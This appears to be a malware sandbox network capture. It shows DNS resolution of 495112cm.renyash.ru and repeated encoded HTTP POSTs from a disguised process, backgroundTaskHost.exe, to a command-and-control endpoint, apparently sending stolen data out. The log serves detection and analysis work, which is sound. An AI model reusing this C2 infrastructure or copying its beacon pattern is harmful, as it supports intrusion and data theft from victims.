                                                                                          Jan 4, 2025 11:09:11.978667974 CET5012480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:11.983544111 CET8050124104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:22.928792000 CET8050139104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:22.983234882 CET5013980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.040625095 CET5013880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.041584969 CET5013980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.042073965 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.046602964 CET8050139104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.046665907 CET5013980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.046900988 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.046963930 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.047032118 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.051876068 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.405004978 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.409914017 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.409940958 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.409950972 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.499315977 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.545696020 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.763359070 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.811311007 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.892199039 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.892683983 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.897207975 CET8050140104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.897267103 CET5014080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.897492886 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:23.897552967 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.897635937 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:23.902484894 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.248899937 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.253793001 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.253806114 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.253854990 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.342242002 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.389400005 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.603180885 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.654982090 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.729407072 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.729724884 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.740782976 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.741395950 CET8050141104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:24.741475105 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.741514921 CET5014180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.741554976 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:24.748117924 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.092591047 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.097599030 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.097613096 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.097621918 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.186860085 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.230860949 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.442658901 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.483099937 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.560715914 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.561218023 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.565665007 CET8050142104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.565710068 CET5014280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.566045046 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.566133976 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.566207886 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.571105957 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.920649052 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:25.925614119 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.925626040 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:25.925633907 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.034452915 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.076858997 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.093457937 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.093462944 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.098277092 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.098391056 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.098488092 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.098561049 CET8050143104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.098661900 CET5014380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.103322029 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.213112116 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.218070030 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.218158960 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.218240023 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.222994089 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.455554008 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.460407972 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.460755110 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.561803102 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.579560041 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.584479094 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.584495068 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.584501982 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.685051918 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.767549038 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.813148975 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:26.836464882 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:26.956968069 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.035586119 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.076914072 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.077872992 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.077933073 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.078527927 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.082829952 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.082874060 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.083137035 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.083178043 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.083308935 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.083363056 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.083452940 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.088185072 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.436322927 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.441231966 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.441243887 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.441255093 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.537556887 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.686338902 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.712111950 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.839535952 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.843570948 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.844588995 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.848360062 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.848390102 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.851675987 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.851675987 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.856518984 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.201920033 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.206875086 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.206886053 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.206896067 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.304510117 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.374732018 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.561491966 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.685340881 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.685885906 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.690438986 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.690548897 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.690753937 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.690865993 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.690932035 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.695663929 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.045684099 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.050510883 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.050525904 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.050535917 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.135080099 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.280005932 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.360640049 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.418735027 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.482685089 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.483335972 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.487679958 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.487720013 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.488135099 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.488188028 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.488266945 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.493084908 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.842552900 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.847528934 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.847539902 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.847548962 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.938638926 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.076893091 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.199486017 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.264388084 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.323183060 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.323724031 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.328265905 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.328510046 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.328598976 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.328599930 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.328701019 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.333481073 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.687578917 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.692464113 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.692475080 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.692485094 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.793955088 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.873769045 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.971450090 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.076884031 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.092895985 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.093517065 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.097924948 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.097966909 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.098392963 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.098443985 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.098578930 CET5015180192.168.2.4104.21.38.84
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 11:07:36.050529003 CET | 56363 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 11:07:36.439692974 CET | 53 | 56363 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 4, 2025 11:07:36.050529003 CET | 192.168.2.4 | 1.1.1.1 | 0x687d | Standard query (0) | 495112cm.renyash.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 4, 2025 11:07:36.439692974 CET | 1.1.1.1 | 192.168.2.4 | 0x687d | No error (0) | 495112cm.renyash.ru | | 104.21.38.84 | A (IP address) | IN (0x0001) | false
Jan 4, 2025 11:07:36.439692974 CET | 1.1.1.1 | 192.168.2.4 | 0x687d | No error (0) | 495112cm.renyash.ru | | 172.67.220.198 | A (IP address) | IN (0x0001) | false
                                                                                          • 495112cm.renyash.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 11:07:36.452708960 CET | 316 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 344
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
Jan 4, 2025 11:07:36.811253071 CET | 344 | OUT | Data Raw: (encoded request body)
Jan 4, 2025 11:07:36.896028996 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 11:07:37.160557985 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HtZMsZJsfUfUE%2B3X1cISOUvQ%2FvIpqTdFsySIF%2F%2F8IPnHfoezPO011Cyo4S8clQqQVL7c%2FSOlsZ2%2Bqdpjj7GH88DNLhlvYH2SrFO%2FIc1SNNZJwhC1Uk47A1998hTHl0mW9NSJUhiG"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c2f5aae6a5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=1622&rtt_var=2394&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=660&delivery_rate=166514&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 4, 2025 11:07:37.160573006 CET | 922 | IN | Data Raw: (encoded response body, continued)
                                                                                          Jan 4, 2025 11:07:37.585690975 CET | 292 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 384
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:37.679642916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:37.679955959 CET384OUTData Raw: 54 58 5e 5e 50 5e 5f 57 5c 5b 52 58 57 5d 58 5f 58 53 5a 5b 52 55 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX^^P^_W\[RXW]X_XSZ[RUQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*9'A"(%V&#X=%5=>$=7S!>+/(64 >*+!Y#!Y,
                                                                                          Jan 4, 2025 11:07:37.932800055 CET | 969 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSi2haKWi%2Bebx4l14qf3a6zw9hRhpktAYL9k%2F3L8tURLb%2Ft%2B2LcQKDD1Y1NYsyJnM99OqME7SszdhSg1RUkDOuY6jiR%2FWw%2FQBvvVxmyU9YT6WUsb2hAqnDBEg%2FRH%2BRZ%2BamIftMJn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c343ea76a5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3535&min_rtt=1622&rtt_var=3732&sent=9&recv=9&lost=0&retrans=0&sent_bytes=2208&recv_bytes=1336&delivery_rate=2540603&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 2b 58 3f 0c 21 2f 38 58 29 00 0f 03 31 09 23 00 2f 31 33 19 20 2f 2c 01 38 0c 3e 03 24 0d 33 01 2a 01 24 1d 23 0e 2b 1c 33 30 2a 5d 06 12 38 58 3c 2c 39 03 32 05 31 0d 2a 22 22 09 33 35 26 5e 27 03 3f 5b 3f 2c 3a 05 25 3c 14 0f 2a 3f 25 01 3a 03 3c 46 38 05 2f 08 36 03 21 53 08 13 20 54 26 0f 2f 56 29 20 29 1f 25 55 3e 02 30 04 2b 1d 2a 3b 30 1b 30 00 36 5b 39 0f 02 00 3c 0d 28 5b 2d 58 20 5c 28 3d 24 0c 27 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+X?!/8X)1#/13 /,8>$3*$#+30*]8X<,921*""35&^'?[?,:%<*?%:<F8/6!S T&/V) )%U>0+*;006[9<([-X \(=$',"\ #V=WL0
                                                                                          Jan 4, 2025 11:07:38.090375900 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:38.184317112 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:38.184494019 CET1844OUTData Raw: 51 5d 5e 53 55 5a 5f 57 5c 5b 52 58 57 5f 58 58 58 54 5a 59 52 56 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^SUZ_W\[RXW_XXXTZYRVQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=/7"20<*1"="0'V .&S(< (6+_7*X*!Y#!Y,2
                                                                                          Jan 4, 2025 11:07:38.494893074 CET | 963 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncQpB5qATQRXKsb%2FP2WtolH%2BzuOGzFuAyKZbFDIsHFLx7l4Yn%2BOJEglKLm2w8MnllURgdtBLzhwSrkMu6RAadoWm%2FlfsWtBcGV%2Bd6YXfi6Clo4bFb1F5uwu7XhnHvQEIQHUEuqeS"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c3759096a5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5682&min_rtt=1622&rtt_var=7194&sent=15&recv=14&lost=0&retrans=0&sent_bytes=3202&recv_bytes=3473&delivery_rate=2540603&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 56 29 3e 20 50 22 06 33 01 2a 07 25 07 26 30 38 12 3b 21 24 03 22 3f 30 03 2f 32 29 10 27 20 28 58 3e 3f 28 55 37 0e 28 08 24 1a 2a 5d 06 12 38 58 28 5a 3e 5b 25 38 2d 0e 2a 32 3d 18 33 26 29 01 24 13 3f 5c 28 12 31 5f 25 02 29 56 2b 2f 2a 5f 2e 3a 27 1f 2d 3f 2f 0e 21 13 21 53 08 13 20 56 25 57 3f 57 29 1e 25 10 31 33 29 5d 24 2a 09 1d 3d 2b 2c 52 24 3e 0f 02 2c 31 23 59 2b 30 24 12 2d 00 27 06 2b 3e 23 54 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$V)> P"3*%&08;!$"?0/2)' (X>?(U7($*]8X(Z>[%8-*2=3&)$?\(1_%)V+/*_.:'-?/!!S V%W?W)%13)]$*=+,R$>,1#Y+0$-'+>#T%<"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          1 | 192.168.2.4 | 49737 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:07:37.821638107 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:38.170082092 CET2520OUTData Raw: 51 5c 5e 5e 50 59 5a 55 5c 5b 52 58 57 59 58 53 58 5c 5a 5a 52 5c 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^^PYZU\[RXWYXSX\ZZR\QX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-**#E48"20'(?1Z!.60X$#R<?;Y?5#[42^+;!Y#!Y,*
                                                                                          Jan 4, 2025 11:07:38.266511917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:38.533514023 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
